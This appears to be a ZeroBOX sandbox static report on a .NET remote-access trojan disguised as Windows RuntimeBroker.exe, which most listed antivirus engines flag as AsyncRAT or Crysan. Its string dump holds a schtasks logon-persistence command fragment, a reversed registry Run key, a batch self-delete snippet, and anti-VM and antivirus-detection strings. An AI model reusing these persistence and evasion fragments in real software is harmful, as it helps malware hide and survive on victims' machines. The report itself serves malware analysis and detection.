Static | ZeroBOX

PE Compile Time

2023-02-28 21:07:22

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x0000b064 | 0x0000b200 | 5.6127443471 |
| .rsrc | 0x0000e000 | 0x0000090c | 0x00000a00 | 5.0333400564 |
| .reloc | 0x00010000 | 0x0000000c | 0x00000200 | 0.0815394123432 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x0000e0a0 | 0x000003f4 | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x0000e494 | 0x00000478 | LANG_NEUTRAL | SUBLANG_NEUTRAL | exported SGML document, UTF-8 Unicode (with BOM) text |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
qzSWbykcNA
SNoObfzMsOMJTA
yGpWMSMoqUA
lZyLbWXfiHVA
KMTSXcyARCTdVA
zDersxJMHWTiA
URdOfuwXFYHB
fYpWhNhJkJB
LSijDCZzFQQB
znyXdRNYrTcB
ETkiGkPHEdB
NZahgBcgayIjB
UIPbutQuVjrVGlB
zNlUGqcdHCvB
YUzHvfhCBLC
QCRAezMRcXLRC
xFhJTMoqDSC
kjMLFVMlFDQSC
JuxYLzwDQpekC
ZsZemxFqoC
eLkmXHTbDTAsC
ZDLMKmoOriApzvC
XmNfBJbgVjxC
XDZhzeVrgABiMyC
MapNameToOID
get_FormatID
oeEsrpyILMD
xzOKmIuTQXZaWJUD
IsZjcvAHZD
XKAiMkdyYaD
DIpUDgSgqQfD
RYWQkeYVHQrMFiD
XtNzEhnevkD
pneyCfZFJHtkIlD
rIeCvVuyGgnD
qDSmiqQVnFRWuD
YtvFDrCJQRTmwhuD
gfcQLTzVhqDMhWVaGE
ebaBJDQVzQLE
nyvnTlERldqclSE
rjFHmvHcFUAoE
XqwwhZeaRJpE
vNluRpcwxE
YawfPdZFLF
TIGLXshQUKjLF
vrJPHKBhwNQF
AgmpvDYrOCjQQF
WejxYtGnmUF
mrsJUpUrvF
RxImvNriMshbG
awUuSBqwCIXWOfG
GHMBZRzXzHzG
fyMaarlOFcsAH
NqsdKWSYaoCH
tvryjQVQAIYxXKH
ZoSRSanqzeLH
PnVtOFfOarHWsfH
aKOXDdnEBzCI
get_ASCII
cTMDENoovJKUII
OhFPUhWavFruBJI
cxYUtTCLduUI
dgshIbkkrKmDnvgI
zzyfHBwgDGJ
byKHDdlaKJ
wYucxkPlUNJ
BmNCroHEIRJ
nbvbEzpUSCYrFzNiQjJ
XWcFQfKmQjwJ
jEsQKrRcHsEK
jaWhgMuvrSK
EcYPiaWfNjpJXlK
UWkidKWSzrK
KpOzQMVJitK
LneWmwjPIFeEL
vMJeHUtyXkJL
ylqfTnecnhlIOL
SliEePMbwfPL
xQAeBIDpvbWhVL
dwzSwebSfJVIWL
tsHQqgHcDVcsZL
OronVyXkKFQERrdL
CHqoHchxliL
hoYqdnxjOnqL
DtJBeisITJtL
MWpMEWtHRM
kdrHIzIKTriftSM
UYmuRnoDwRqpM
bLHhgjLgvBN
fdBtIqqzEN
WpQeSJARBMN
HVcRAyPiqWnPN
YxFoHhZIJTN
yFuCmnLOFVN
YWhpTpJdyVjN
hPWOYotnOpN
yUNFkXIuzSIZHO
System.IO
JRQJLWZVrRKJO
crmXTlThZivuNO
WzdJqTRZybO
wkXsgLSMhXglO
scwkVKoGxoO
HHaQKGMYENDrO
EpVMVTkKyYwO
wKRBBqkmGxO
yndsEjgqhAP
EspcSsFKcCLP
tweEPPcLZGnOP
MNZvJtddyvWP
pBPBydmidYhsXciP
iDNdcOnMeXtP
ZZRGLhFWmIQ
VihuXKlBzPqEQQ
QoPgGtdOpebezQQ
qhruXjGkTQ
CZYQRgFEDWQ
rcbYQcoVQbQ
gKrTxxbsHJlQ
wnNRXkpmssQ
KDVpqzETNMHR
EXFhTVZPOwtYHR
mjrCALFMJbjR
ydReCOSjoR
DghaSXzZjJkoR
ndlZRxnHwR
MCQTVEqopKRCS
XJbjHmgeXdFS
jraywTvoTMS
qXyqalJHsONS
mJxoDwIpSRUS
BuqVWQvXDHUfS
kebGHipzjLAFqXCT
ohrNpdgHedT
WpVqPZKOoSyggT
hKgJFhrinT
pfxBfoDMawT
WIkAZiiMChxT
BnnoTVmHGBU
RVgTRATdJU
FfXmRYBTCFjOU
aUkMQcZysbRU
oXaEaPUvYuNmU
bWCEkPczdTqU
SsnhHTPpzCrU
SFIlnhtKsU
ITzphiAyxU
get_IV
set_IV
GenerateIV
HEbeNgSazcniKPV
waBzHsoXNZV
DdQbVpDifdV
YEZmPDrnEiPRvV
vNQcuCSQUSW
icCPMkzpiW
MZiGxkhVCLjW
UrMdoPnFlmW
BkeJMXJLDdWNrW
GllCrqDtcsW
NmiNvGAdPX
NAWrDojeDtzRX
IoPpeskFVVFTjX
hgTeWOXQbSnX
TJlNHJimVrX
tDpmfVqRIrzTdsX
UbOyLciTGDY
dMHLJfiXiHjY
EhGBWqgKGKVxY
vEdTSKXvkCZ
KtyZhAPtDZ
nJYHiPalnglRZ
PyhjksYfWTaZ
gvRMUBllQjjcZ
AfErYIkkmtnZ
xArbDUioKnqZ
value__
QkbWdIBNStwLa
GNWHViXTIMRSKWa
XBVbhNxCTMxa
jwsDpdoSOjGb
aHlpACORAIb
VvzIsQWdbGdKb
FYUgJJjkWhb
mscorlib
SmGEGKuunzoob
wBarDyhycjzb
QKWSmJvrzb
JviHjdvzUc
cEcqALUlgRlVc
qdyiqNsZbBic
System.Collections.Generic
Microsoft.VisualBasic
ywTwnVfvVUmc
QHZIBwfGemc
yVCyOThzHhjdymc
get_SendSync
YNQdcMyRTLVDd
mEVEBiUvDd
hkfTGZocVHd
XmpupSwDrwBTKd
yuOndYtLxLd
prQFICohvmWd
EndRead
BeginRead
Thread
kfbtUaMHHcbd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
bRHfckxsyqtd
GTyQPVoNHud
htPzmRojXQxd
emoPYBCdQNzd
iYSYmNtqbKCe
ATzsspMAQgRjGe
pLypKnppHe
YIXRCkpfjFLe
evucLfqdfMLe
bZoWnBaJNLe
zowWLKNdWXlQe
BXdIzyntTe
ScZlfMSIGUe
XcUfxmtTMGXe
ZLrpTMLGchMZce
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
Invoke
oTEhvYXBle
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
jcvCaSWANnoe
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
sXZLnErDawkue
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
xMstwwDxZzumhvxe
IFlvnlCMize
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
alFHzUAqkqPcBf
VWsvvMlbjFf
qhSIkawrjnLf
hHKLWbjzqZMETdwLf
OKaROyyefpSf
KbUqBdhoTNbf
QJiuwBYuZywef
AdrdtIyoff
NzFlWGkadkf
BncISwEuCycnf
PkhutlICupf
VAsAFbhCkYyrqf
kjxfWAsaXaZyAg
QBuPZczLaMOBg
JSdulVRqiDg
pisQZSFBfbgARg
jEpKDYxvKLSg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
XJgRXMSHvuwmsg
RriRAbnXFffamxg
BnCgYsDdyg
yJQZXQWVRh
PBITYHaHEfRh
KMEmnSuUEWJUh
YojQOLJKch
IYDeaGLHtvmh
ComputeHash
VerifyHash
QcMUZLvoFqzsh
get_ExecutablePath
GetTempPath
get_Length
NkcvdLcbWhSPDi
XahtkbWGmRDLLBbKi
sdKCbPohmzMi
usCZMVOpSgoZi
oAMsZUfici
ansGEhIlJKgi
brCrYltDXkvfqi
jxWnUDPBVsi
fkZpBFdXyTJj
LYnZIsKrhLOj
nHYDkEsUFRj
lxFetquCCOsBYZj
PthoyqMlOPfj
CuRzqjPogaWIgj
QllvTSHbyjhj
xJOneyrVlj
qaweauazBPqj
sgcUgUBWkBak
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
icKoNxWzcbok
NAtsRQiEhpCl
HDvNEzccPifNl
uQYXGmZyrqqVl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
vkGGZhBzll
ekQPIDLFkfspl
NJnYELewceEm
DTRvORQwFNm
tHXbVLAjYMTVm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
YbPJsRbuFcAqm
ICryptoTransform
AmFHpEREtm
cdhwpdpVsym
GJsvPZjBxxCn
tcxFLbxvUIexIn
KGtrnwqycNhqOn
CCdDsyjfZQWnGan
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
CarcpBvQPln
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
RzzGmEWeQNo
eveumAePldo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
kPLKFmHervo
nafiWLmpSp
mhhTpFVQqcJUcp
Microsoft.CSharp
wwWfORRMByTqCTq
FuYzBQEPLaUq
System.Linq
IphTiwMEifiTr
WUEGcgzLsbr
vYQNYcvcugTer
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ggHTkBIRQCioer
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
vKiPAjWaMxpsBgr
WFGyQcgQUREbir
MCgeFAwGGgmr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
PhLbgqWabFvr
fttoQBYNaCRAs
nPzjeBLTChzgSdSIs
aemSClhBIzqFVNs
tGrWYomFICas
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
IqVuKkvhRts
System.Net.Sockets
set_Arguments
SystemEvents
Exists
ozBQPhnbmws
ncWujOFXsUIt
MAfvQjFQjBrTt
FBsejrFcUKZt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
eTLTKrtjfet
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
xgUiwSImhdht
qsGEdctZIITUjt
IAsyncResult
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
TCKLyzlLRiqt
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
hHnFtEgdETuKAu
EojymGRnGu
qTPrwIIiZIu
LqphliSEKu
krxvmjmBRGKymbu
DvFwqoMFpVMAHeu
dNqEqbYQJv
RAMgNEyDvXRLv
AICzzErbnUNv
UCzztElOUWv
GyzdpKxJePlWLw
mArFqbfwHrkeWw
UtvOolKeWaw
FOmlEkWlIebDuhw
GetForegroundWindow
set_CreateNoWindow
YoztlrDHXibqw
ntLBsDJdGUSBx
QhFipkFBNx
tnAehNOlDddNOx
NYfpOSMDCjOx
IafMsXCzGiZx
ZyGdyBhpUax
JWIKFuSybx
BxGJbNXRnucx
TFFWGHjcOorjx
PdONclIUAKvPvx
bYBYNnXxhdVlEy
EpVaKZnuJZGy
InitializeArray
ToArray
get_AsArray
CCsJoKzeLcy
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
BRpzuiWkeKVSAz
zrrDxRYylmGz
UguFpBLsxEcmKz
IEedcHqMfz
ZnoaIKkeVQxz
CdskckvMbAyz
JimGuiFgzz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
SHA256
aypXubTeUjqPUYRyGJzON5l6bgDz38kRnZ5egK287eoaTXhIYyYxaHq4ePzHUnZ6VrRJwkqVtQeRoaTJUCN0Q3KhtlKyTuLJxCgkd0T8qpw=
xGAe2pl0VpM/flF+GhglJ+TJvFWTK2iTnn1Ye7WOHzA3Gs61kiiS2VhMB609uU+izuMZvfG32Of/wEe+L8VJ6SNlc6veKFHnnbjWmSedPo3/uwvbjS7OR3fDLdCQH62x
d4O4sdPFujwGI79jPWP4DjwAYkr+NoQD5KFyOAG0qL0vX5fk1V7TbOI1tZyzlBxhHh01xX3I8btnaud/mswAjQ==
DUGaCaFu/sy+2SG7NGW9W/DZ+d6G5tZ4peasDvXjE6FaqFxKqNWJPui7/S/5pNCCxJ8e39cIJliKwQtlYphZRA==
%AppData%
svchost.exe
ellxR2x6aTNoOHdVcVNMd2FzOHdZcVdHQUF3dXV6MzA=
dPvXNHAFZRuRx9W3ZH6des/dDdcpr1jviON2XL1QvfJ7P9HG6iCxFGB5Z9N5jA3pC8pldjZqRm0x0WKTTmneN5BFUfIejjVUcIf+cHsCLPA=
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
JQQ+ReNggoUF/pGinvwiwkH1rCmNYLkRXKzmO5qPls6ALBjS6nNkPsByyvf+BrMqO9Sg1e16xm4H+9iDV0Uk5Q==
fcIjIpTcW1WGIPZ7zXMCe1BOlZzI7qSSiw25f0VQtVWXABY8Ng+eLH8PR8IKQOAhD+cPQMGnfFFzvsrT4X3YgA==
+CP8TPH+62Kv1JxMVmHnAX1FuJgQVl6+x8lr+dLSFpjQkNSpupVw6W2PH1+sKR0IijF5rGtPh9cjh8tyyuCSSA==
0EiNAEdUwGzi2YKFBlU7hp+sIzX/ags9n1zdM10WAAxPQain6ttgVeyZzhxfNxL0621TxWA1RxrOn4eae6l5PQ==
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Runtime Broker
FileVersion
6.2.19041.746
InternalName
RuntimeBroker.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
RuntimeBroker.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
6.2.19041.746
Assembly Version
6.2.19041.746
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
tehtris Clean
ClamAV Win.Packed.Razy-9625918-0
CMC Clean
CAT-QuickHeal Trojan.IgenericFC.S14890850
Skyhigh BehavesLike.Win32.Generic.pm
ALYac Gen:Variant.Jalapeno.657
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 005678321 )
Alibaba Clean
K7GW Trojan ( 005678321 )
Cybereason malicious.445aa6
huorong Backdoor/Crysan.a
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/AsyncRAT.A
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Cynet Clean
Kaspersky HEUR:Backdoor.MSIL.Crysan.gen
BitDefender Gen:Variant.Jalapeno.657
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Jalapeno.657
Tencent Trojan.Msil.Agent.zap
TACHYON Clean
Sophos Troj/AsyncRat-B
F-Secure Heuristic.HEUR/AGEN.1305744
DrWeb Trojan.Siggen9.56514
VIPRE Gen:Variant.Jalapeno.657
TrendMicro Backdoor.MSIL.ASYNCRAT.SMXSR
McAfeeD Real Protect-LS!A7ED4BA445AA
Trapmine Clean
FireEye Generic.mg.a7ed4ba445aa61c4
Emsisoft Gen:Variant.Jalapeno.657 (B)
Ikarus Backdoor.AsyncRat
GData MSIL.Trojan.PSE.1BITXMO
Jiangmin Clean
Webroot Clean
Varist W32/Samas.B.gen!Eldorado
Avira HEUR/AGEN.1305744
Antiy-AVL Clean
Kingsoft malware.kb.c.1000
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Jalapeno.657
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.MSIL.Crysan.gen
Microsoft Backdoor:MSIL/AsyncRat.AD!MTB
Google Detected
AhnLab-V3 Malware/Win32.RL_Generic.C4269477
Acronis Clean
McAfee Fareit-FZT!A7ED4BA445AA
MAX malware (ai score=88)
VBA32 OScope.Backdoor.MSIL.Crysan
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.CFQ!tr
BitDefenderTheta Gen:NN.ZemsilF.36810.dm0@auysLjb
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Backdoor[rat]:MSIL/Agenttesla.Stub.LQL!MTB
No IRMA results available.